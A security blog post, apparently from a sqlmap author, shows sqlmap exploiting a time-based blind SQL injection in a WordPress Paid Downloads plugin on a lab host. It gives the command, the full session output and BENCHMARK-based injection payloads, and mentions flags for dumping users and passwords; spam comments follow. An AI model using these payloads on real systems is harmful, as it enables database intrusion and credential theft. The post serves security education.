For all of you who wondered how to exploit time-based SQLi vulnerabilities here you'll find a short presentation using sqlmap. This is also dedicated to all people around that think that time-based injection(s) is something of no significant practical value.
If you've followed vulnerabilities posted lately on this blog you've probably seen some of the PoCs (engl. abbr. Proof of Concept) containing payloads like "-1 AND 1=IF(2>1, BENCHMARK(5000000, MD5(CHAR(115,113,108,109,97,112))),0)--%20". Those cases are the perfect candidates for some good old time-based exploitation.
We'll take "WordPress Paid Downloads plugin <= 2.01 SQL Injection Vulnerability" as a candidate for this little presentation:
$ python sqlmap.py -u "http://172.16.180.133/wp-content/plugins/paid-downloads/d
ownload.php?download_key=1" --dbms=mysql --level=3 --risk=3 --technique=T --bann
er
sqlmap/1.0-dev (r4374) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 18:54:25
[18:54:25] [INFO] using '/home/stamparm/Work/sqlmap/output/172.16.180.133/sessio
n' as session file
[18:54:25] [INFO] testing connection to the target url
[18:54:27] [INFO] heuristics detected web page charset 'ascii'
[18:54:27] [INFO] testing if the url is stable, wait a few seconds
[18:54:29] [INFO] url is stable
[18:54:29] [INFO] testing if GET parameter 'download_key' is dynamic
[18:54:31] [WARNING] GET parameter 'download_key' appears to be not dynamic
[18:54:33] [WARNING] heuristic test shows that GET parameter 'download_key' migh
t not be injectable
[18:54:33] [INFO] testing sql injection on GET parameter 'download_key'
[18:54:33] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[18:54:33] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[18:54:34] [CRITICAL] the target url responded with an unknown HTTP status code,
try to force the HTTP User-Agent header with option --user-agent or --random-ag
ent, sqlmap is going to retry the request
[18:54:38] [CRITICAL] there is considerable lagging (standard deviation: 0.9 sec
) in connection response(s). Please use as high value for --time-sec option as p
ossible (e.g. 10 or more)
[18:54:43] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[18:55:05] [INFO] GET parameter 'download_key' is 'MySQL < 5.0.12 AND time-based
blind (heavy query)' injectable
[18:55:05] [INFO] checking if the injection point on GET parameter 'download_key
' is a false positive
GET parameter 'download_key' is vulnerable. Do you want to keep testing the othe
rs? [y/N] N
sqlmap identified the following injection points with a total of 40 HTTP(s) requ
ests:
---
Place: GET
Parameter: download_key
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: download_key=1' AND 6424=BENCHMARK(5000000,MD5(CHAR(102,100,78,99))
) AND 'uzOQ'='uzOQ
---
[18:55:36] [INFO] testing MySQL
[18:55:36] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[18:55:46] [INFO] confirming MySQL
[18:56:05] [INFO] the back-end DBMS is MySQL
[18:56:05] [INFO] fetching banner
[18:56:05] [INFO] retrieved: 5.1.41-3ubuntu12.8
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL >= 5.0.0
banner: '5.1.41-3ubuntu12.8'
[19:07:44] [INFO] Fetched data logged to text files under '/home/stamparm/Work/s
qlmap/output/172.16.180.133'
[*] shutting down at 19:07:44
p.s. Notice that the retrieval of banner took around 10 minutes (attackers will in these kind of cases take just the most sensitive information, like usernames and passwords). Same way you can retrieve other data by using switches like: --users, --passwords, --dump, etc.
$ python -c "print ''.join([chr(x) for x in [115,113,108,109,97,112]])" sqlmap:)
12 comments:
ah ok, time-based "errät" also anhand von verbrauchen zeiten welche informationen abgefragt werden? wie krass ist das denn... sehr gutes tool dieses sqlmap.
Hi Miroslav,
Sometime ago I read about a technique to read a file with a BSQLi and load_file() but instead of reading char by char it reads byte per byte reducing and I dont find it. Do you know about it?
Hi Miroslav,
Sometime ago I read about a technique to read a file with a BSQLi and load_file() but instead of reading char by char it reads byte per byte reducing and I dont find it. Do you know about it?
I know this if off topic but I'm looking into starting my own blog and was wondering what all is required to get setup? I'm assuming having a blog
like yours would cost a pretty penny? I'm not very internet smart so I'm not 100% positive. Any recommendations or advice would be greatly appreciated. Thank you
My web page: learn more here
I've been surfing online more than three hours today, yet I never found any interesting article like yours. It is pretty worth enough for me. In my view, if all web owners and bloggers made good content as you did, the web will be a lot more useful than ever before.
my homepage :: visit for english golden retriever information details
Also see my site: excellent goldendoodle pups info
Admiring the time and energy you put into your website and in depth information you provide.
It's good to come across a blog every once in a while that isn't the same out of date rehashed
material. Great read! I've bookmarked your site and I'm adding your RSS feeds
to my Google account.
Feel free to surf to my page get golden retriever lab mix puppy stuff
my web page :: more golden retrievers puppies stuff
This is the right website for anyone who wants to find out about this topic.
You know a whole lot its almost tough to argue with you (not that I actually will need to…HaHa).
You certainly put a fresh spin on a topic that's been written about for ages. Great stuff, just excellent!
My web page - article source
Today, I went to the beachfront with my kids. I found a sea shell and gave it
to my 4 year old daughter and said "You can hear the ocean if you put this to your ear." She placed the shell to her ear
and screamed. There was a hermit crab inside and it pinched her ear.
She never wants to go back! LoL I know this is completely
off topic but I had to tell someone!
Also visit my web site click for information golden retriever facts
An outstanding share! I have just forwarded this onto a friend who has been doing a little research on this.
And he actually bought me dinner due to the fact that I discovered it for him.
.. lol. So let me reword this.... Thank YOU for the meal!
! But yeah, thanx for spending the time to talk about this matter here on your website.
Here is my blog post; more bonuses
Hey there! This is my 1st comment here so I just wanted to give a quick shout out and say I truly enjoy reading through your blog posts.
Can you suggest any other blogs/websites/forums that cover the same topics?
Many thanks!
my weblog :: Additional Reading
Useful information. Fortunate me I discovered your site
by accident, and I am surprised why this coincidence didn't happened in advance! I bookmarked it.
my webpage: quality can golden retrievers be black content
This is very interesting, You are a very skilled blogger.
I have joined your feed and look forward to seeking more of
your fantastic post. Also, I have shared your web site in my social
networks!
Feel free to surf to my homepage - good golden retrievers pups information
Post a Comment